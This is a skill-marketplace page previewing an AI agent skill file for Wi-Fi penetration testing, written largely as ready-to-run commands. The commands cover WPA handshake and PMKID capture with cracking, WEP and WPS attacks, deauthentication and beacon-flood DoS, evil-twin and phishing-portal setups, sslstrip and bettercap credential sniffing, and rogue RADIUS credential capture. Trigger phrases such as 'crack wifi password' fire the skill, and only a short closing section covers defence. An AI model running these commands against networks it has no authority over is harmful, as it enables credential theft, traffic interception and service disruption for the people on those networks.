Skip to main content

wireless-security-wifi-pentest

Wireless security penetration testing with aircrack-ng, WEP/WPA/WPA2/WPA3 attacks, and 802.11 exploitation

설치로 이동

소스 정보

저장소
reason-machines/security-skills
최근 소스 활동
2026년 7월 30일 12:39
감지된 SKILL.md 언어
영어
스타
12
포크
1

설치 방법

기본적으로 소스를 먼저 확인하는 Prompt가 선택됩니다. 직접 명령으로 전환하거나 로컬 사본을 다운로드할 수도 있습니다.

소스 파일 검토

설치 여부를 결정하기 전에 SKILL.md와 SkillsMP에 표시된 보조 파일을 읽어 보세요.

SKILL.md 표시 중

SKILL.md
소스 지침 · 읽기 전용 미리보기
name
wireless-security-wifi-pentest
description
Wireless security penetration testing with aircrack-ng, WEP/WPA/WPA2/WPA3 attacks, and 802.11 exploitation
triggers
["crack wifi password","capture wpa handshake","perform deauth attack","test wireless security","setup monitor mode adapter","create evil twin access point","crack wep encryption","wireless penetration testing"]
# Wireless Security & WiFi Penetration Testing > Skill by [ara.so](https://ara.so) — Security Skills collection. Expert-level wireless security penetration testing using aircrack-ng suite, handshake capture, WEP/WPA/WPA2/WPA3 cracking, rogue AP deployment, and 802.11 exploitation techniques. This skill covers reconnaissance, attack execution, and defensive mitigation for wireless networks. ## What This Skill Covers - **802.11 fundamentals**: Frame types, encryption protocols (WEP, WPA, WPA2, WPA3), authentication mechanisms - **Adapter configuration**: Monitor mode setup, packet injection testing, chipset compatibility - **Reconnaissance**: Network discovery, hidden SSID enumeration, client enumeration, traffic analysis - **WEP attacks**: IVS capture, PTW attack, fragmentation, Chop-Chop, Caffe Latte - **WPA/WPA2 attacks**: Handshake capture, deauthentication, PMKID extraction, dictionary/GPU cracking - **WPA3 exploitation**: Downgrade attacks, Dragonblood vulnerabilities - **Rogue AP attacks**: Evil twin deployment, captive portals, wireless MITM - **Enterprise WPA**: EAP/RADIUS assessment, certificate validation bypass - **Detection & defense**: WIDS configuration, management frame protection, hardening recommendations ## Prerequisites ### Hardware Requirements - **Injection-capable wireless adapter** (Atheros AR9271 or Ralink RT3070/RT5372 chipset) - TP-Link TL-WN722N v1 (Atheros AR9271) ✅ - Alfa AWUS036NHA (Atheros AR9271) ✅ - Panda PAU05 (Ralink RT5372) ✅ - **Avoid**: TL-WN722N v2/v3 (Realtek, no injection support) - **Test access point** you own and control - **Client device** for handshake generation - **Kali Linux** (bare-metal or VM with USB passthrough) ### Software Stack ```bash # Verify Kali includes core tools (pre-installed) which aircrack-ng airodump-ng aireplay-ng airbase-ng # Install additional tools sudo apt update sudo apt install -y \ hashcat hcxdumptool hcxtools \ reaver bully wash \ hostapd dnsmasq \ kismet wireshark-qt \ bettercap wifiphisher ``` ## Adapter Setup & Monitor Mode ### Identify Wireless Interface ```bash # List wireless interfaces iwconfig ip link show # Check interface details iw dev # Verify chipset (Atheros/Ralink preferred) lsusb lspci | grep -i wireless ``` ### Enable Monitor Mode ```bash # Method 1: Using airmon-ng (recommended) sudo airmon-ng check kill # Kill interfering processes sudo airmon-ng start wlan0 # Creates wlan0mon # Method 2: Manual setup sudo ip link set wlan0 down sudo iw dev wlan0 set type monitor sudo ip link set wlan0 up # Verify monitor mode iwconfig wlan0mon # Should show "Mode:Monitor" ``` ### Test Packet Injection ```bash # Critical test before attacks sudo aireplay-ng --test wlan0mon # Expected output: # Injection is working! # Found X APs # Trying broadcast probe requests... # Injection is working! # Test against specific AP sudo aireplay-ng --test -a 00:11:22:33:44:55 wlan0mon ``` ### Set Regulatory Domain & Channel ```bash # Check current regulatory domain iw reg get # Set domain (affects power/channels) sudo iw reg set US # or GB, DE, etc. # Set specific channel sudo iw dev wlan0mon set channel 6 # Set frequency (alternative) sudo iw dev wlan0mon set freq 2437 # Channel 6 = 2437 MHz ``` ## Reconnaissance & Network Discovery ### Basic Network Scan ```bash # Scan all channels, all encryption types sudo airodump-ng wlan0mon # Scan specific channel sudo airodump-ng -c 6 wlan0mon # Scan specific band sudo airodump-ng --band a wlan0mon # 5 GHz only sudo airodump-ng --band bg wlan0mon # 2.4 GHz only # Save to file sudo airodump-ng -w scan_output --output-format pcap,csv wlan0mon ``` ### Target Specific Network ```bash # Focus on single BSSID sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w target wlan0mon # Show only clients (stations) sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 --showack wlan0mon ``` ### Hidden SSID Discovery ```bash # Passive: Wait for client probe/association sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 wlan0mon # Active: Deauth client to force reassociation (reveals SSID) sudo aireplay-ng --deauth 5 -a 00:11:22:33:44:55 wlan0mon ``` ### Client Enumeration with Kismet ```bash # Start Kismet server sudo kismet -c wlan0mon # Web UI: http://localhost:2501 # First run: create admin user # CLI query connected clients kismet_client --list-clients --server localhost:2501 ``` ## WPA/WPA2 Handshake Capture ### Capture 4-Way Handshake ```bash # Terminal 1: Start capture on target channel sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon # Terminal 2: Deauth client to force reauthentication sudo aireplay-ng --deauth 10 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon # -a = AP BSSID # -c = Client MAC (optional, omit to deauth all clients) # 10 = number of deauth packets # Look for "WPA handshake: 00:11:22:33:44:55" in airodump-ng output ``` ### Verify Handshake Capture ```bash # Check for valid handshake in capture file sudo aircrack-ng capture-01.cap # Output should show: # 1 handshake # Alternative verification with tshark tshark -r capture-01.cap -Y "eapol" | grep -i handshake ``` ### Convert Handshake for Hashcat ```bash # Extract handshake to hashcat format sudo aircrack-ng -J output capture-01.cap # Creates output.hccapx (hashcat 3.6+) # Modern method with hcxpcapngtool (hashcat 6.0+) hcxpcapngtool -o output.22000 capture-01.cap # Creates output.22000 (WPA*01/02 hash format) ``` ## PMKID Attack (Clientless WPA/WPA2) ### Capture PMKID ```bash # Modern method with hcxdumptool (no deauth needed) sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1 # Let run for 2-5 minutes, Ctrl+C to stop # Convert to hashcat format hcxpcapngtool -o pmkid.22000 pmkid.pcapng # Verify PMKID present grep -c "22000" pmkid.22000 ``` ## WPA/WPA2 Cracking ### Dictionary Attack with Aircrack-ng ```bash # Crack using wordlist sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap # Specify BSSID if multiple networks in capture sudo aircrack-ng -w wordlist.txt -b 00:11:22:33:44:55 capture-01.cap # Show cracking progress # KEY FOUND! [ password123 ] ``` ### GPU Cracking with Hashcat ```bash # WPA/WPA2 handshake (mode 22000) hashcat -m 22000 -a 0 output.22000 /usr/share/wordlists/rockyou.txt # PMKID (mode 22000) hashcat -m 22000 pmkid.22000 wordlist.txt # With rules for mutations hashcat -m 22000 -a 0 output.22000 wordlist.txt -r /usr/share/hashcat/rules/best64.rule # Mask attack (brute-force patterns) hashcat -m 22000 -a 3 output.22000 ?d?d?d?d?d?d?d?d # ?d = digit, ?l = lowercase, ?u = uppercase, ?s = special # Show cracked passwords hashcat -m 22000 output.22000 --show ``` ### Precomputed Rainbow Tables (Cowpatty) ```bash # Generate rainbow table for SSID genpmk -f wordlist.txt -d pmk_database.db -s "TargetSSID" # Crack using precomputed table (instant if password in table) cowpatty -d pmk_database.db -r capture-01.cap -s "TargetSSID" ``` ## WEP Cracking ### Passive IVS Collection (PTW Attack) ```bash # Capture IVs on busy network sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w wep_capture wlan0mon # Wait for 40,000+ IVs (Data column in airodump) # Then crack: sudo aircrack-ng wep_capture-01.cap # KEY FOUND! [ XX:XX:XX:XX:XX ] (ASCII: "wepkey") ``` ### Active ARP Replay Attack ```bash # Terminal 1: Capture sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w wep_arp wlan0mon # Terminal 2: Fake authentication sudo aireplay-ng --fakeauth 0 -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF wlan0mon # Terminal 3: Wait for ARP packet, then replay sudo aireplay-ng --arpreplay -b 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF wlan0mon # IVs accumulate rapidly (1000+/sec) # Once 40K+ IVs collected, crack as above ``` ### Fragmentation Attack (No Clients) ```bash # Fake auth sudo aireplay-ng --fakeauth 0 -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF wlan0mon # Obtain keystream with fragmentation sudo aireplay-ng --fragment -b 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF wlan0mon # Use keystream to forge ARP packet sudo packetforge-ng --arp -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF -k 192.168.1.1 -l 192.168.1.2 -y fragment-*.xor -w arp_packet # Inject forged packet sudo aireplay-ng --interactive -r arp_packet wlan0mon ``` ## Deauthentication & DoS Attacks ### Deauth Single Client ```bash # Targeted deauth sudo aireplay-ng --deauth 0 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon # 0 = infinite deauth packets (Ctrl+C to stop) ``` ### Deauth All Clients (Network DoS) ```bash # Broadcast deauth (affects all clients) sudo aireplay-ng --deauth 0 -a 00:11:22:33:44:55 wlan0mon # With reason code sudo aireplay-ng --deauth 10 -a 00:11:22:33:44:55 --reason 7 wlan0mon ``` ### MDK4 Beacon Flood ```bash # Flood with fake APs (WLAN DoS) sudo mdk4 wlan0mon b -a -m # Deauth flood sudo mdk4 wlan0mon d -b /path/to/blacklist.txt ``` ## Evil Twin & Rogue AP Attacks ### Basic Evil Twin with Hostapd ```bash # Create hostapd config cat > evil_twin.conf << EOF interface=wlan0 driver=nl80211 ssid=TargetSSID hw_mode=g channel=6 macaddr_acl=0 ignore_broadcast_ssid=0 auth_algs=1 wpa=2 wpa_passphrase=12345678 wpa_key_mgmt=WPA-PSK rsn_pairwise=CCMP EOF # Start evil twin AP sudo hostapd evil_twin.conf # In another terminal, assign IP and run DHCP sudo ip addr add 192.168.1.1/24 dev wlan0 sudo dnsmasq -C /dev/null -kd -F 192.168.1.10,192.168.1.100 -i wlan0 --bind-dynamic ``` ### Wifiphisher Automated Evil Twin ```bash # Automatic evil twin + phishing portal sudo wifiphisher -aI wlan0mon -eI eth0 -p firmware-upgrade # Common phishing scenarios: # -p firmware-upgrade # -p oauth-login # -p browser-plugin-update ``` ### Capture Credentials with Bettercap ```bash # Start bettercap sudo bettercap -iface wlan0 # In bettercap console: > set wifi.interface wlan0mon > wifi.recon on > wifi.ap.ssid "TargetSSID" > wifi.ap.bssid 00:11:22:33:44:55 > wifi.ap.channel 6 > set http.proxy.sslstrip true > set net.sniff.verbose true > http.proxy on > net.sniff on # Captures credentials, cookies, traffic ``` ## WPS Attacks ### WPS PIN Brute Force with Reaver ```bash # Check WPS enabled sudo wash -i wlan0mon # Reaver attack sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -vv # With delay to avoid rate limiting sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -vv -d 5 -T 0.5 -N # Pixie Dust attack (offline, fast) sudo reaver -i wlan0mon -b 00:11:22:33:44:55 -vv -K ``` ### Bully WPS Attack ```bash # Standard attack sudo bully wlan0mon -b 00:11:22:33:44:55 -c 6 # Pixie Dust sudo bully wlan0mon -b 00:11:22:33:44:55 -d -v 3 ``` ## Enterprise WPA (EAP/RADIUS) Assessment ### Enumerate EAP Methods ```bash # Use eapmd5pass or EAPHammer git clone https://github.com/s0lst1c3/eaphammer.git cd eaphammer ./eaphammer --certs --eap-spray # Identify EAP type in captured traffic tshark -r capture.pcap -Y "eap" -T fields -e eap.type | sort -u ``` ### Certificate Validation Bypass ```bash # Rogue RADIUS with EAPHammer sudo ./eaphammer \ --interface wlan0 \ --essid "EnterpriseSSID" \ --creds \ --auth wpa-eap # Captures credentials when clients ignore cert warnings ``` ## WPA3 & Advanced Attacks ### WPA3 Downgrade Attack ```bash # Force WPA3 AP to WPA2 transition mode sudo mdk4 wlan0mon d -a 00:11:22:33:44:55 # Or use hostapd-wpe with transition mode disabled ``` ### Dragonblood (CVE-2019-13377) ```bash # Test for Dragonblood vulnerability git clone https://github.com/vanhoefm/dragonslayer.git cd dragonslayer ./dragonslayer.py --test wlan0mon --bssid 00:11:22:33:44:55 ``` ## Traffic Analysis & MITM ### Capture & Decrypt WPA Traffic ```bash # Capture traffic sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w traffic wlan0mon # After obtaining PSK, decrypt in Wireshark: # Edit → Preferences → Protocols → IEEE 802.11 # Enable decryption, add key: # wpa-pwd:password123:SSID ``` ### SSL Strip & Traffic Sniffing ```bash # Route traffic through attacker (on rogue AP) sudo sysctl -w net.ipv4.ip_forward=1 sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # SSL strip with sslstrip sudo sslstrip -l 8080 sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080 # View captured credentials tail -f /var/log/sslstrip.log ``` ## Detection & Defense ### Management Frame Protection (802.11w) ```bash # Enable in hostapd.conf ieee80211w=2 # Required # Protects against deauth/disassociation attacks ``` ### Wireless IDS with Kismet ```bash # Configure alerts in kismet.conf alert=DEAUTHFLOOD,5/min,Deauthentication DoS alert=DISCONFLOOD,5/min,Disassociation DoS alert=BSSTIMESTAMP,10/min,Evil Twin Detected # Monitor for rogue APs sudo kismet -c wlan0mon --daemonize ```
GitHub에서 보기
이 SKILL.md는 매우 커서 SkillsMP가 여기에는 첫 섹션만 미리 보여줍니다. GitHub에서 보기